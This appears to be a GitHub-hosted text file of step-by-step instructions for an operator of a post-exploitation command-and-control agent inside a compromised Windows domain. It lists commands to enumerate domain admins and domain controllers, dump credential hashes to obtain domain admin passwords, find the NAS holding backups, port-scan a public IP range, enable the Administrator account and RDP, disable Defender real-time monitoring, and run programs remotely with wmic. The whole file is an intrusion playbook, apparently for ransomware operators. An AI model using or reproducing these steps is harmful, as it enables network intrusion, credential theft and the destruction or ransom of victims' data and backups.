-
Notifications
You must be signed in to change notification settings - Fork 37
/
Copy path02_useful_commands.txt
24 lines (20 loc) · 1.68 KB
/
02_useful_commands.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
GO TO THE AGENT:
RIGHT-CLICK ON THE AGENT NAME AND CLICK INTERACT
1) VIEW THE LIST OF ADMINISTRATORS WITH THIS COMMAND : net group "domain admins" /domain
2) DOMAIN NAME WITH THIS COMMAND : net view /all /domain
3) VIEW THE LIST OF DCs WITH THIS COMMAND : nltest /dclist:"NameDomain"
4) TO FIND OUT THE LIST OF SERVERS, LOAD THE PowerView MODULE (RIGHT-CLICK ON THE AGENT), Get Info > Get Servers OBTAIN A LIST OF SERVERS
5) FIND OUT THE LIST OF COMPUTERS SINCE THE PowerView MODULE HAS ALREADY BEEN LOADED WITH THE RIGHT MOUSE BUTTON ON THE AGENT, Get Info > Get All Computers RECEIVED A LIST OF COMPUTERS
6) IT IS NECESSARY TO FIND OUT THE PASSWORDS OF ALL DOMAIN ADMINS BY RIGHT-CLICKING ON THE AGENT, CLICK ACCESS > DUMP HASHES GO TO THE VIEW > CREDENTIALS TAB ABOVE, TAKE ALL THE HASHES AND LOOK FOR DOMAIN ADMINS
7) WE NEED TO FIND THE NAS WITH THE BACKUP
WITH THIS COMMAND WE WILL FIND OUT ALL THE SUBNETS OF THIS DOMAIN : powershell Get-NetSubnet
THE NEXT COMMAND IS TO FIND OUT WHICH IP ADDRESS THE NAS IS LOCATED ON, portscan 107.191.177.1-107.191.177.255 5000 icmp 1024
A LIST OF USEFUL COMMANDS THAT CAN COME IN HANDY:
REMOVE AGENT RIGHTS BEFORE DEFAULT rev2self
ENABLE USER VIA CMD PROMPT : net user Administrator /active:yes
USER INFORMATION COMMAND : net user careadmin /domain
ENABLE RDP CONNECTION shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections/t REG_DWORD /d 0 /f
DISABLE DEFENDER : powershell Set-MpPreference -DisableRealtimeMonitoring $true
UPDATE POLICIES : repadmin /syncall/AdeP
SHOW DOMAIN TRUSTS shell nltest /domain_trusts /all_trusts
RUNNING THE PROGRAM ON ANOTHER PC : wmic /node:"PC NAME" process call create "COMMAND TO PROCESS"